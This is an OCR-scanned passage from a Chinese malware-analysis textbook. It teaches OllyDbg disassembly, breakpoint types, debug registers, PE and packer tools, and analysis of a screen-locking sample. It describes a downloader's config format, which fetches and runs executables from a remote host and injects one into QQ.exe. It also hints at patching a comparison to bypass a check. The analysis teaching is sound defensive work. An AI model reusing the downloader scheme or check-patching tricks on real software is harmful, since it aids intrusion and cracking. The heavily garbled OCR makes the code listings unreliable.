程序 执行 后 进入 Load 函 数 执行 Call Test 指 令 ， 其 作用 就 是 激活 Test 子 函数 。 在 汇编 语 
言 中 有 详细 解释 ，Call 执行 后 程序 的 流程 就 进入 了 Test 子 函数 里 ， 上 述 汇编 代码 则 是 进入 
了 00401000 这 个 地 址 内 ， 因 为 Call 支 持 直接 进入 Call 地 址 、Call 寄 存 器 。 

如 果 想 看 Call 所 指示 的 子 函数 的 话 ， 可 按 OD 的 快捷 键 F7。 这 里 直接 按 下 F7 键 跟 进 ， 
看 到 如 图 9-3 所 示 结 果 。 


9-3 г 
这 里 有 个 类 似 中 括号 的 符号 ， 括 住 的 内 容 就 是 一 段子 函数 ， 其 sub test() 
结构 如 图 9-4 所 示 。 
说 明 : 参数 是 保存 在 栈 中 的 ， 而 栈 是 通过 ss: sp 来 定位 的 。 每 
次 用 Call 调 用 子 函 数 的 时 候 ， 如 果 有 参数 必然 会 调用 push， 因 为 
push 是 压 栈 操 作 ， 意 思 是 将 数据 压 入 栈 内 。 


end sub 
Ё 9-4 Ранен 


00401000 /$ 68 30704000 push 00407030 ; 

ASCII "Hello Иог1а!", 

ҺЕ 

// 这 一 条 指令 的 意思 是 将 00407030 地 址 内 的 ASCII 字 符 "Hello ног1а" Ж Л 1% 
00401005 |. E8 06000000 call 00401010 

// 跳 转 到 00401010 地 址 去 执行 代码 ,这 里 的 00401010 就 相当 于 Sub Test () 
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0040100А |. 83С4 04 ааа езр, 4 
/ /平衡 栈 空间 

0040100D |. 33C0 xor eax, eax 
// 清 空 寄存 器 

0040100Е N. СЗ retn 

/ ГБ [6] 


至 此 可 以 大 概 地 梳理 出 代码 的 反 汇 编 代码 执行 流程 。 


#include "stdafx.h" 

int main(int ағас, char* arqv[]) 
{ 

printf ("Hello,world!\n"); 

return 0; 


} 


首先 执行 主 函 数 main。 因 为 main 有 3 个 参数 ， 所 以 要 把 这 3 个 参数 事先 压 入 到 栈 空间 ， 
以 便 调 用 main 的 时 候 可 以 在 main 函 数 内 部 得 到 参数 。 

压 入 完成 后 执行 Call 函 数 ， 跳 转 到 main 主 程序 。main 程 序 首先 调 用 printf 函 数 ， 因 为 
printf 国 数 有 一 个 参数 ， 所 以 在 调用 函数 之 前 先 把 参数 压 入 到 栈 中 再 调用 ， 所 以 承 有 如 下 
的 反 汇 编 代 码 。 

00401000 /$ 68 30704000 push 00407030 ; АЗСТТ “Hello World!” ,LF 

00401005 |. E8 06000000 call 00401010 


调用 完成 之 后 需要 平衡 栈 空间 ， 由 于 这 里 的 系统 是 32 位 的 ， 所 以 参数 就 是 4。 


0040100А |. 83C4 04 add езр, 4 


清空 eax 寄 存 器 后 返回 ， 执 行 return 0。 这 就 是 上 述 代 码 的 执行 流程 。 
再 看 一 段 代码 。 


inelad ПЕН h” 
int main(int ағас, сһаг% агду[]) 


( 


іпЕ а; 

scanf ("%а", &а) ; 
Е 

I |) 

[printf ("уа"); } 
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else 
[printf ("КМ"); } 
return 0; 


} 


从 代码 逻辑 看 ， 可 以 知道 输入 1 会 提示 成 功 ， 其 他 值 均 为 失败 。 这 里 是 最 基本 的 判 
Ër, 其 中 只 是 将 a-- 变 形 了 一 下 。 
下 面 是 上 面 代 码 的 反 汇 编 的 main 代 码 。 


00401000 /5 51 push ecx ; 011у0054Т.004080С8 

// 保 护 现场 

00401001 |. 8D4424 00 Теа eax, dword ptr [esp] 
// 获 取 int a 变量 的 地 址 保存 进 eax 寄 存 器 内 

00401005 |. 50 Push еах 

// 将 a 的 地 址 压 材 

00401006 |. 68 40804000 push 00408040 ; ASCII "за" 
// 将 字符 压 栈 

0040100B |. E8 71000000 call 00401081 

// 调 用 scanf 函 数 

00401010 |. 8В4424 08 mov eax, dword ptr [esp+8] 
// 将 输入 的 数字 保存 进 eax 寄 存 器 内 , 这 里 的 esp+8 实 际 因 为 a 地 址 是 第 二 个 参数 
00401014 |. 83C4 08 ааа езр, 8 

/ /平衡 栈 空间 

00401017 |. 48 dec eax 

// 这 里 是 eax 内 的 数据 进行 减 1 操作 

00401018 |. 83F8 01 cmp eax, 1 

// 将 eax 寄 存 器 的 内 容 与 1 进行 比较 

0040101B |. 894424 00 mov амога ptr [esp], еах 
// 将 eax 寄 存 器 里 的 内 容 保存 进 a 变 量 内 

0040101Ғ |. 75 11 jnz short 00401032 

// 如 果 不 为 2 则 跳 转 

00401021 |. 68 38804000 push 00408038 

ПЕЛ "Ві" 字符 

00401026 |. E8 25000000 call 00401050 


// 执 行 打印 输出 函数 

0040102B |. 83C4 04 ааа езр, 4 
/ /平衡 栈 

0040102E |. 33C0 xor eax, eax 
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// 清 零 

00401030 |. 59 рор есх 
// 弹 出 ecx 

00401031 |. СЗ retn 

/ NBE 


00401032 |> 68 30804000 push 00408030 
// 压 入 “失败 ”字符 
00401037 |. ЕЗ 14000000 са11 00401050 


// 执 行 打印 输出 函数 

0040103С |. 83C4 04 ааа езр, 4 
// 平 衡 栈 

0040103Е |. 33С0 xor eax, eax 
// 清 零 

00401041 |. 59 pop есх 
// 弹 出 ecx 

00401042 \. СЗ геїп 

/ ГЕ [8] 


提示 : 可 以 看 到 00401018 |. 83Е8 01 cmp eax，1 是 个 关键 ， 把 1 修改 为 2 试 试 ? 

下 面 来 解释 软件 调试 分 析 中 的 部 分 术语 。 

栈 是 一 组 连续 的 内 存 地 址 ， 其 大 小 为 <=2^ 操 作 系统 位 数 为 32，ss: sp 为 两 个 与 栈 有 关 
的 寄存 器 。 

> 5 为 段 寄 存 器 。 

> sp 为 偏 移 和 寄存器 。 

ss: sp 在 任意 时 刻 都 指 同 栈 项 ， 即 栈 空 间 最 大 值 加 上 一 个 字 节 。 

当 栈 为 空 的 时 候 ， 栈 里 没有 元 素 ， 也 就 没有 了 上 所谓 的 栈 顶 元 素 ， 只 能 指 回 下 一 
个 内 存单 元 。 例 如 : 将 10000H 一 1000FH 作 为 栈 ， 当 其 为 空 的 时 候 ， 其 中 ss: sp 为 
10000Н--10010Н; 当 要 压 入 元 素 时 ax=2266H， 则 执行 push ax 时 ，ss: sp 指向 的 栈 顶 为 
10000Н--10010Н-2 (这 里 的 2 可 能 是 位 数 ) ， 也 就 是 10000H 一 1000EH， 然 后 写 入 数据 ， 
高 地 址 数据 存 入 高 地 址 ， 低 地 址 数据 存 入 低地 址 。 

ah=22 存 入 1000FH，al=66 存 入 1000EH， 压 入 栈 的 时 候 sp+2， 弹 出 栈 的 时 候 sp-2。 

拿 到 样本 (这 里 的 样本 默认 为 可 执行 文件 ) 后 ， 要 用 杀 病 毒 软件 进行 查 杀 ， 然 后 得 到 
样本 的 杀毒 软件 定义 名 称 ， 接 痢 用 搜索 引擎 进行 搜索 得 询 ， 看 看 有 没有 有 用 的 信息 。 接 
着 还 要 用 PEiD 查 看 这 个 样本 的 输入 表 ， 看 都 有 什么 函数 ， 然 后 再 看 这 个 程序 是 否 是 窗口 
程序 。 

如 果 是 : 确认 这 个 窗口 是 否 是 MFC 窗 口 ， 如 果 是 就 检查 MFC 窗 口 启动 前 有 没有 和 多余 
的 操作 。 分 析 的 时 候 结 合 IDA 能 够 更 快 地 得 到 启动 函数 的 内 存 地 址 ， 然 后 可 以 对 比 MFC 启 
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动 函数 的 源 代码 。 

如 果 不 是 : 也 需要 找到 局 动 函 数 。 这 个 大 家 可 以 目 行 编写 一 些 窗口 程序 进行 分 析 。 

首先 打开 一 于 HIPS 软 件 〈( 能 够 记录 较 多 行为 的 软件 ) ， 然 后 直接 在 OllyDbg 运 行 (已 
经 对 样本 输入 表 进行 下 断 ) 。 这 一 过 只 是 粗略 地 结合 HIPS 日 志 ， 大 体 地 了 解 这 个 样本 的 
功能 ;然后 才 是 根据 这 些 零散 的 功能 做 具体 分 析 。 

例如 下 载 者 样本 ， 在 运行 后 由 于 是 下 载 者 ， 必 要 的 工作 是 验证 是 否 联网 ，〈 有 些 编 
与 者 不 验证 网 络 直接 下 载 ， 这 对 分 析 没 有 太 大 影响 ) ， 然 后 寻找 服务 器 ， 得 到 下 载 地 址 路 
径 。 如 果 是 批量 下 载 可 能 还 会 遇 到 字符 的 处 理 问 题 ， 比 如 以 下 格式 的 下 载 地 址 。 

http: \1.1.1.1\1.txt 

内 容 如 下 : 

Бир: \\1.1.1.1\1.exe，NULL， 运 行 

Бир: \1.1.1.12.DLL， 注 入 到 QQ.exe， 运 行 

http: \1.1.1.1\3.exe，NULL， 运 行 

http: \1.1.1.1\4.exe，NULL，3 秒 运行 

当 从 http: \\1.1.1.1\1.txt 获取 样本 后 ， 会 获取 到 上 述 格式 的 字符 串 。 

这 时 就 要 进行 字符 截取 ， 首 先是 回 车 待 ， 其 次 是 有 逗号 ， 然 后 定义 一 个 数组 。 这 里 只 给 
出 伪 代 码 : 

字符 串 = 获 取 网 络 地 址 字符 С “http: \1.1.1.1\1.txt”) ; 

数组 = 分 割 字 符 〈 字 符 串 ， 回 车 符 ) ; 

数组 1= 分 割 学 符 ( 数 组 ， 豆 号) ; 

则 


数组 1 [0] // 为 地 址 
数组 1 [1] // 为 指令 
数组 1 [2] // 是 直接 运行 还 是 等 待 运行 


然后 再 根据 指令 下 载 。 

上 述 是 下 载 者 在 下 载 前 对 字符 的 处 理 ， 接 下 来 介绍 OllyDbg 的 下 断 方式 。 

首先 说 明 一 下 中 文 帮助 文档 。OllyDbg 支 持 数 种 不 同类 型 的 断 点 。 

(1) 一 般 断 点 (Ordinary breakpoint) 。 将 想 中 断 的 命令 的 第 一 个 字 节 ， 用 一 个 特殊 
命令 INT3( 调 试 器 陷阱 ) 来 百代 。 在 反 汇 编 窗 口中 ， 选 中 要 设 断 点 的 指令 行 并 按 F2 键 ， 
就 可 以 设 定 一 个 此 类 型 的 断 点 ， 也 可 以 在 快捷 菜单 中 设置 。 再 次 按 下 F2 键 时 ， 断 点 将 被 
删除 。 注 意 ， 程 序 将 在 设置 断 点 指令 被 执行 之 前 中 断 。 

INT3 断 点 的 设置 数量 是 没有 限制 的 ， 当 关闭 被 调试 程序 或 者 调试 器 的 时 候 ，OllyDbsg 

将 目 动 把 这 些 断 点 保存 到 人 硬盘 中 。 永 远 不 要 试图 在 数据 段 或 者 指令 的 中 间 设 置 这 种 断 点 ， 
如 果 在 代码 段 以 外 设置 断 点 ，OllyDbg 将 会 发 出 警告 。 在 安全 选项 (Security options) 中 天 
闭 这 个 提示 ， 调 试 器 在 某 些 情况 下 会 插入 目 带 的 临时 INT3 断 点 。 

(2) ÆFA (Conditional breakpoint) ， 其 快捷 键 ShifttF2。 条 件 断 点 是 一 个 带 
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有 条 件 表达 式 的 普通 INT3 断 点 。 当 调试 器 遇 到 这 类 断 点 时 会 计算 表达 式 的 值 ， 如 果 结 
果 非 零 或 者 表达 式 无 效 ， 将 暂停 被 调试 程序 。 当 然 ， 由 条 件 为 假 的 断 点 引起 的 开销 是 非 
常 高 的 (主要 归 因 于 操作 系统 的 反应 时 间 ) 。 在 Windows NT、 和 奔腾/450 处 理 器 环境 
下 ，OllyDbg 每 秒 最 多 处 理 2500 个 条 件 为 假 的 断 点 。 条 件 断 点 的 一 个 典型 使 用 情况 就 是 在 
Windows 消 有 息 上 【比如 WM PAINT) 设置 断 点 。 为 此 ， 可 以 将 伪 变 量 MSG 同 适 当 的 参数 
说 明 联 合 使 用 ， 如 果 窗 口 被 激活 ， 可 参考 后 面 的 消息 断 点 摘 述 。 

(3) 条 件 记 录 断 点 (Conditional logging breakpoint) ， 其 快捷 键 为 ShifttF4。 条 件 记 
录 断 点 是 一 种 条 件 断 点 ， 每 当 遇 到 此 类 上 断 点 或 者 满足 条 件 时 ， 它 将 记录 已 知 函 数 表达 式 
或 参数 的 值 。 例 如 ， 可 以 在 一 些 窗口 过 程 函 数 上 ， 设 置 记录 断 点 并 列 出 对 该 函数 的 所 有 
调用 。 要 么 只 对 接收 到 的 WM_COMMAND 消 息 标 识 符 设 断 点 ， 要 么 对 创建 文件 的 函数 
(СтеаеЕйе) 设 断 点 ， 并 且 记 录 以 只 读 方式 打开 的 文件 名 等 ， 记 录 断 点 和 条 件 断 点 的 速 
度 相 当 ， 从 记录 窗口 中 浏览 上 百 条 消息 要 比 按 上 百 次 F9 键 轻松 得 多 ， 读 者 可 以 为 表达 式 选 
择 一 个 预先 定义 好 的 解释 说 明 。 

设置 通过 次 数 。 每 次 符合 暂停 条 件 时 ， 计 数 器 就 会 减 1。 如 果 通 过 次 数 在 减 1 前 ， 不 等 
于 0，OllyDbg 就 会 继续 执行 。 如 果 一 个 循环 执行 100 次 (十 进 制 ) ， 在 循环 体内 设置 一 个 
断 点 并 设置 通过 次 数 为 99 十进制) ，OllyDbg 将 会 在 最 后 一 次 执行 循环 体 时 暂停 。 

条 件 记 录 断 点 允许 传递 一 个 或 多 个 命令 给 插件 (plugins) 。 例 如 ， 读 者 需要 使 用 命令 
行 插件 改变 一 个 寄存 器 的 内 容 ， 然 后 继续 执行 程序 。 

(4) WÑ aA (Message breakpoint) 。 消 息 断 点 和 条 件 记 录 断 点 基本 相同 ，OllyDbsg 
会 自动 产生 一 个 条 件 ， 这 个 条 件 允 许 在 窗口 过 程 的 入 口 处 设置 某 些 消息 〈 比 如 WM_ 
PSINT) 断 点 ， 可 以 在 Windows 窗 口中 设置 它 。 

(5) 跟 踩 断 点 〈Trace breakpoint) 。 跟 踩 断 点 是 在 每 个 选中 命令 上 设置 的 一 种 特殊 
的 INT3 断 点 。 如 果 设 置 了 Hit 跟 踪 Chit trace) ， 断 点 会 在 命令 执行 后 移 除 并 在 该 地 址 处 做 
一 个 标记 ;如 果 使 用 的 是 Run 跟 踪 (run trace) ，OllyDbsg 会 添加 跟踪 数据 记录 并 且 仍 然 保 
持 断 点 的 激活 状态 。 

(6) ИЕ (Memory breakpoint) 。OllyDbg 每 一 时 刻 只 允许 有 一 个 内 存 断 点 。 
在 反 汇 编 窗口 、CPU 窗 口 、 数 据 窗口 中 选择 一 部 分 内 存 ， 然 后 使 用 快捷 菜单 可 以 设置 内 存 
断 点 ， 此 时 如 果 有 以 前 的 内 存 断 点 ， 将 被 目 动 误 除 。 要 么 在 内 存 访问 〈 读 、 写 、 执 行 ) 
时 中 断 ， 要 么 在 内 存 写 入 时 中 断 。 设 置 此 类 断 点 时 ，OllyDbg 将 会 改变 所 选 部 分 的 内 存 块 
属性 。 在 与 30 X86 兼容 的 处 理 器 上 ， 将 会 有 4096Byte 的 内 存 被 分 配 并 保护 起 来 ， 即 使 仅仅 
选择 了 1 个 字 节 ，OllyDbsg 也 会 将 整个 内 存 块 都 保护 起 来 ， 这 将 会 引起 大 量 的 错误 警告 ， 
请 小 心 使 用 此 类 断 点 。 茶 些 系统 函数 〈 尤 其 是 在 Windows 95/98 下 ) 在 访问 受 保护 的 内 存 
时 ， 不 但 不 会 产生 调试 事件 反而 会 造成 被 调试 程序 的 月 溃 。 

(7) WFir (Hardware breakpoint) 〈 仅 在 Windows ME/NT/2000 下 可 用 〉 。 Æ 
80X86 兼 容 的 处 理 器 上 ， 人 允许 设置 4 个 硬件 断 点 ， 硬 件 断 点 和 内 存 断 点 不 同 ， 它 并 不 会 降 
低 执 行 速度 ， 但 是 最 多 只 能 履 盖 4 个 字 节 。 在 单 步 执行 或 者 跟 踩 代码 时 ，OllyDbg 能 够 使 用 
便 件 断 点 代替 INT3 断 点 。 
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(8) 内 存 访问 一 次 性 断 点 (Single-shot break on memory access) (ХЕ Алпдоуув 
NT/2000 下 可 用 ) 。 对 整个 内 存 块 设置 该 类 断 点 可 以 通过 内 存 窗口 的 快捷 沫 单 〈 或 按 F2 
Ж) 来 完成 。 厦 想 捕捉 调用 或 返回 到 菏 个 模块 时 ， 该 类 断 点 就 显得 特别 有 用 。 中 断 发 生 以 
后 ， 断 点 将 被 删除 。 

(9) 暂停 Run 跟 踪 (Run пасе pause) 其 快捷 键 为 Ctrl+T。 暂 停 Run 跟 踪 是 在 每 一 步 
Run 跟 踪 (тап trace) 时 都 要 检查 的 一 个 条 件 集 ， 它 可 以 在 EIP 进 入 某 个 范围 或 超出 某 个 范 
围 时 暂停 、 茶 个 条 件 为 真 时 和 暂停、 命令 与 指定 的 模式 匹配 时 暂停 、 当 命令 可 疑 的 时 候 暂 
停 。 注 意 ， 这 一 选择 会 极 大 地 【高 达 20%) 降低 Run 跟 踪 的 速度 。 

OllyDbg 也 可 以 在 一 些 调试 事件 (debugging events) 上 暂停 程序 执行 ， 比 如 加 载 或 超 
载 DLL、 局 动 或 终止 线程 或 者 程序 发 出 调试 字符 串 的 时 候 暂 停 。 

CPU 操 作 的 对 和 象 是 寄存 器 ， 寄 和 存 器 义 有 诸多 分 类 ， 其 中 有 一 类 就 是 调试 和 测试 寄 
存 器 。 

调试 寄存 器 被 称 为 DR。(n 为 下 角 标 ) 。DR 调 试 寄存 器 总 共有 8 个 ， 从 DR。 到 DR,。 

每 个 寄存 器 的 作用 如 下 。 

> DR,—DR,: 调试 地 址 寄存 器 (保存 地 址 ) 。 


| ат. ~ Ce + F 
оны 2] TT OO 


> DR,—DR;: 保留 。 90009000 
> DR: 调试 寄存 器 组 状态 寄存 器 。 хуаран 


> DR: 调试 寄存 器 组 控制 寄存 器 。 даи 

在 OllyDbg 中 的 调试 寄存 器 窗口 可 以 查看 寄存 器 的 09090000 
值 ， 如 图 9-5 所 示 。 图 9-5 ”调试 寄存 器 

这 里 下 一 个 硬件 访问 断 点 〈( 见 图 9-6) ， 可 以 看 到 DR 已 经 保存 了 断 点 1 指向 的 地 址 。 
而 DRs、DR; 也 出 现 了 数据 。 这 里 不 对 此 歼 述 ， 因 为 涉及 了 标志 位 ， 具 体 的 详细 解释 可 以 
参考 百度 百科 或 者 相关 书籍 。 


[| (оо 002rrco 
# Е ЖА ФЕ 081 880888088 


—P DR2 0000080880 
уг Í Керм 
2 | = | maae | Araz. DR6 ЕЕЕЕВЕЕО 

з | Ea рез | | рез [R7 000760501 


-- 一 一 ШИБИР ШЕ xn . 1 п 


图 9-6 硬件 断 点 
设置 访问 断 点 之 后 ， 如 果 是 在 API 上 下 断 会 直接 定位 到 API 地 址 。 关 于 标题 栏 的 指 问 
技巧 ， 如 图 9-7 所 示 。 


K 011У1ІСЕ - 输入 法 广 入 . exe - [CPU - ЕЕ, БН! - mSVBVN60] 


ЖК ОЛЛУТСЕ - ЖАЙНА ехе - [CPU - ЕБЕ, ЯН - АБН: 
图 9-7 OllylCE 标 题 栏 比较 
在 图 9-7 上 方 显示 “模块 -MSVBVM60” 字 样 ， 如 果 显 示 的 并 非 是 调试 程序 的 名 称 ， 说 
明 已 经 离开 了 用 户 代码 ， 如 果 这 个 时 候 去 脱 充 ， 脱 的 并 不 是 调试 程序 的 充 。 
常用 下 断 点 的 方式 是 bp API 函 数 〈 见 图 9-8) ， 例 如 bp DeleteFileA (区 分 大 小 写 ) 。 
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程序 直接 运行 后 ， 遇 到 DeleteFile 函 数 调用 就 会 断 下 来 ， 这 里 也 有 人 会 人 bp DeleteFile W Hr 
点 。 需 要 说 明 一 下 ， 此 方式 涉及 字符 处 理 的 API 都 有 两 个 版 本 ， ANSI ("А") 和 ("W") 


的 Unicode № Ж. 

00503018 90 00 00 е 86u61BFh|rCnhLL 2] peleteFileh ЗЕ А duad.00501BF 

00504028 вв 99 00 ÚG 90012Е69%| 005853045 | СЕі1еНате = "aaa" 

00504038 вв 990 во в 0012F 698 0012F9818 

p05D5058 во во оо в 0812Е69С 08175Е70! 

ппорлйов во 00 во G O812F6A0 0009009090 | 

00508068 вв 99 вв в 8012F6ñ5] СССССССС! 

00505078! 00 00 00 0.20 0012768 СССССССС | 

Command Бр Оеіеѓеғіед а! снаа е тул 
тер = ТЕЕ тт ТТ = w — ии 


29-8 Бр API 函 数 


通过 这 个 断 点 可 以 知道 这 个 样本 目 运 行 后 会 删除 什么 。 如 果 确 定 这 个 位 置 就 是 病毒 的 
到 断 点 ， 然 后 逐个 分 析 每 一 个 语句 。 


9.2.2 


首先 打开 样本 ， 


“ШТИП” ABAN 


此 时 会 弹出 来 一 个 对 话 框 窗口 ， 可 以 看 到 


鼠标 被 限制 在 窗口 区 域内 ， 并 出 现 困 面 图 标 消失 等 状况 ， 如 图 


9-9 所 示 。 


使 用 OllyDbg 载 入 这 个 程序 ， 执 行 到 入 口 处 〈 见 图 9-10) 。 


$ 
96401191 |. 
80401193 


80401195 


810424 761Е0! add dword ptr [esp], 1Е76 

ЕЕОВ са11 еах 

бя 00 push В 

ЕВ 26000000 call <|тр.ЕКЕННЕІ 32.ЕхіЕРғосе55> 


图 9-10 ”入 口 点 位 置 


前 面 都 是 一 些 加 载 易 语言 库 文件 的 操作 ， 很 容易 找到 入 口 。 

然后 ， 按 F7 键 跟 进 这 个 call [call eax] 语 句 ， 这 里 不 再 葡 述 了 。 由 于 只 有 一 个 按钮 ， 所 
以 跟踪 到 这 个 按钮 事件 。 

此 时 可 以 一 目 了 然 地 看 到 密码 ， 如 图 9-11 所 示 。 


E8 В3110000 
взса 18 
8945 РС 
68 0C315000 
FF75 ЕС 
ЕВ 86F7FFFF 
взса 08 
83F8 00 
вв 000060000 


ЕВ 98110000 
83C4 04 
азтп ге аа 


4. ЧР ú РЕР ЕР 


9-11 “ВРАТ” ЫЗ 


— 186 — 


call ООЦВЯЕЕЗ Ра 
ада еср, 19 да 
тоу dword ptr [ebp-4] eax аа де 
push 00406310C ASCII “woz 
push dword ptr [еһр-%] м 
са11 0089409 FRR 
add esp, 8 

спр eax, Ü 

тоу eax, 9 

sete al 

тоу dword ptr [ebp-8], eax 

тоу ebx, dword ptr [ebp-4] 

test ebx, ebx 

je short 00489074 

push ebx 

call B048AF 05 比较 密码 
add esp, 4 

етп пиле пере Ггоһљ-9 1 а 


| 


СВ” та 


89-9 


ExitCode = 8 
ExitProcess 


зов ”病毒 不 神秘 = 7 Жа 


这 里 如 果 中 毒 的 话 ， 可 以 直接 再 运行 这 个 程序 ， 然 后 输入 wozhenxiangzisha 就 可 以 了 。 


9.2.3 重要 辅助 工具 


当然 ， 要 想 更 加 透彻 地 分 析 病 毒 ， 仅 仅 使 用 OD 是 不 够 的 ， 本 节 将 介绍 一 些 常 用 的 病 
毒 分 析 工 具 ， 便 于 读者 从 行为 、 部 分 源码 上 理解 病毒 的 原理 ， 以 及 杀毒 软件 是 如 何 有 效 防 
治 病 毒 入 侵 计 算 机 的 原理 。 


1 PEiD 一 一 查 壳 工 具 

РЕР СЛ. 9-12) 在 本 书 中 多 次 提 到 ， 是 一 于 非常 优秀 的 针对 PE 文件 的 查 充 软件 ， 
病毒 通过 加 过 一 方面 为 了 达到 免 杀 的 目的 ， 另 一 方面 也 是 为 了 保护 代码 不 被 轻易 地 破解 分 
析 。 di 


"Е PEiD у0. 95 


File: {C:\Documents and Settingstadmin В fF аза.ехе 


Entrypoint: 00020Е70 
File Offset: 00006270 
Linker Info: 6.0 


EP Section: [PXI [>] 
First Bytes: Б0,ВЕ,00,80 ша 


Мо thing Found * 
Multi Scan | Task Wiewer | Options | | About | = 


№ Stay ontop 


图 9-12 ”PEiD 使 用 界面 
图 9-13 所 示 的 是 一 个 加 这 的 文件 。 很 显然 ， 程 序 代码 通过 加 密 以 后 ， 第 一 行 显示 出 来 
的 并 不 是 程序 入 口 点 函数 所 代表 的 基地 址 ， 同 时 也 无 法 从 代码 中 读 出 有 用 的 信息 。 


< 011уІСЕ 一 P ааа. ехе — [CPU 一 主线 程 ， 模块 — ВЯ ааа] 
-ЕгІТ SEV 调试 四 ) ЗФ) AAD СЕ ЖЕҢУ (Н) 


90428000 
dword ptr [esi+FFFD9088] 


е51, 
ейі, 
edi 
ebp, 
ebx, 
eax, 
eax 
esp, ebx 


80420Е71 
80Ң2рЕ?б 
0042DE7C 
909420Е?7 
0042DE7F 


esp L | 
dword ptr [esp-3E88] 
eax 


80Ң2рЕ89 


8ӨҢ2рЕВВ 
99420ЕЗ О 
8642DES8E 
8ӨҢ2рЕВҒЕ 


99420Е?З 8 | . 


0042DE95 


B042DE9F 


B042DEAQ| . 


80842DEA3 


short В8420ЕВ8В 
есі 

есі 

ebx 

2B529 

edi 

ebx, 4 


ebx 
ЕС 
есі 


ebx, 4 
ebx 


[ 9-13 加 壳 文件 


进行 脱 壳 处 理 之 后 ， 就 能 很 明显 地 看 到 代码 的 真实 面目 ， 代 码 第 一 行 也 恢复 为 正常 的 
入 口 点 函数 ， 同 时 从 注释 中 可 以 看 到 该 程序 调用 了 MessageBoxA 函 数 ， 如 图 9-14 所 示 。 
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к 011уУІСЕ - ааа. ехе 一 [CPU - 主线 程 ， 模 块 - ааа] 

图 | 文件 下) 查看 (Y) МФ МФ лт ПФ #800 

Па ЕСС ВС ШВ мвемтмнсткивеае ет? 
90491918 

00101011 || . > ВВЕС тоу ebp, esp 

00101013 || 。 83EC 40 sub esp, 48 

99491016 |. 53 push ebx 

0950108171]. 56 push е51 

00101018 |. 57 push edi 

00501019 ||. 8070 СО lea edi, dword ptr [ebp-40] 

0050101C | . B9 10000000 тоу есх, 19 

0021010211]. В8 СССССССС тоу eax, СССССССС 

0010180826 |. ЕЗ:АВ кер stos dword ptr ес:Гейі| 

0901018928 || . 8BF4 тоу есі, евр 

90401021 ||. ба өө push 0 Style = МВ ОК| МВ APPLMODAL 
0049102С|| . 68 30204200 |push 00422030 Title = "yes" 
883010311). 68 28204200 | push 00422028 Text = “haha” 
0010108036 | . óA ӨӨ push 9 h0wner = NULL 
903091038 || . FF15 АСА2420!са11 dword ptr [<&USER32 .МеззадеВохй] .Ме55адеВохй 

00101 03Е || . ЗВЕЦ спр есі, esp 

00401050 |. E8 58000000 |са11 _ спкевр 

001010255 ||. 8BF4 тоу есі, esp 

00401047|| . ба ӨӨ push 9 Style = НВ ОК| МВ ВРРСМООЯГ 
99481849 |. 68 242804200 push 00422024 Title = "по" 

0040104E|| - 68 1C204200 push 00422801C Text = "уауа" 
00401053 1] . ба 98 push 9 hOwner = NULL 

00401 055 FF15 ЯСА2428! са11 dword ptr [<&USER32 .МеззадеВохй! СМеѕѕадцеВохӣ 


89-14 ”文件 脱 壳 后 
人 简单 地 说 。PE 文 件 就 是 Windows 平 台 上 的 可 执行 程序 ， 包 括 exe、dll、com、sys、ocx 
等 各 种 文件 。 
既然 作用 于 计算 机 的 病毒 都 是 PE 文件 格式 ， 那 么 也 可 以 使 用 专门 分 析 PE 文 件 的 软件 
来 分 析 病 毒 ， 如 Stud PE。 


2 Stud_PE 


在 Stud РЕ 〈 见 图 9-1$) 的 “在 16 进 位 编辑 器 中 视图 文件 头 树 ”中 的 “数据 Н” В 
后 ， 可 以 清楚 地 看 到 数据 是 被 加 了 UPX 壳 〈 见 图 9-16) 。 


‚; Ѕ+па РЕ 编 辐 - 7 ЭР ааа ехе” — 132 他 应 用 程序 ] < 
vF з) TAT HAY 


E:Vdocuments and settingsadmin ЕЛ = аааехе 4 44 4 4 4 4 í 4 í í í í í í 
Ш|> 文件 头 |у Dos | ова | wam |= wi | ожа | 进程 |* 选 项 | 
зона GRISHA) жы _ 目录 

| ооо2рето | 
[00006270 ”入 口 点 (实际 地 址 ) 
| 00400000 ве 
[00030000 ве 


БИДЕ 大 小 实际 地 址 


址 
| Am _][ 00022000 | ooooooE0 | о0006Е0О 


| не |100000000 [ 00000000 「 00000000 


FHAR: ва? вв шн AE x 


[зонах [++ |Госооосоо [00000000 [`00000000 
在 16 进 位 狂 特 器 中 视图 文件 头 树 ТР 


Гоо001000 зе [P]: 
Г 00000000 ”核验 和 E] 
=== 


— 


dr rr ы. шн 


ЯНУ esa PE 论坛 。 < ял 


Stud РЕ 8444: DOS XPA 4 
[ << | >> | 复 件 aaa.exe ЧЕ: 0х00000000 区 块 大 少 : 0x300 


^ 


alla 


|<. 


29-15 Stud РЕЛЕ 
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зов “病毒 不 神秘 / „ША 


00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

00 оо оо 00 оо оо оо оо оо оо оо оо 00 оо оо ОО 

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 оо | 
00 00 00 00 00 00 00 00 | .. UPXO. 


9-16 ”UPX 壳 
打开 Stud_PE 主 界面 的 函数 选项 ， 可 以 清楚 地 了 解 到 该 程序 调用 的 函数 类 型 〈 见 医 
9-17) 


Stud РЕ їн: “ ӘЖ ааа. ехе“ - [32 AMME ] 
УГЕ) 编辑 区 ) IAT HAW 


\аоситепіѕ апа settings\admin 8 1% ааа.ехе 


ъжна | ъпо | оэ “Яғ |на | ежа 
-输入 函数 


MessageBoxA оға: rva2lat: 0002Е058 


图 9-17 ”函数 分 析 界 面 
其 中 KERNEL32.DLEL 装 载 的 是 程序 的 winmain 入 口 函数 ，USER32.DLL 装 载 则 是 
MessageBoxA， 这 可 是 在 加 充 的 情况 下 就 能 看 到 的 ， 因 此 一 于 分 析 PE 文 件 的 软件 在 加 充 程 
序 函 数 的 分 析 上 是 优 于 调试 器 的 ， 类 似 的 软件 还 有 PEview。 
当然 ， 也 有 专门 分 析 程 序 调用 函数 的 武器 一 一 Dependency Walker ( 见 图 9-18) 。 


Dependency Walker - [9 fF ааа. exel 
EÈ File Edit View Dptions Profile Yindow Help 
cH ‚2 б ct ez ан Зант ъЕ т № 
日 … Ë] £f ААА ЕЕ B| sr | огаішаі ° |нш |Funetion [му вы | 


由 -… О KEEL. DLL 1 С] НА О 10:00200) | МезззЕеБохА Not Pound 


Я се. ща 
由 … ® KERNEL32. DLL 
е А FTDLL. DLL 
B- за ADVAPI32.DLL 
: H- (№ EEREEL32 ILL 
е иш.ш. 
в. ГІ ЕРГЕТІ DLL 
е- WINTRUST ILL 
= EL] SECVR32.DIL 
ее ADVAPT32 IL EIUS аң нн ЫН ын 
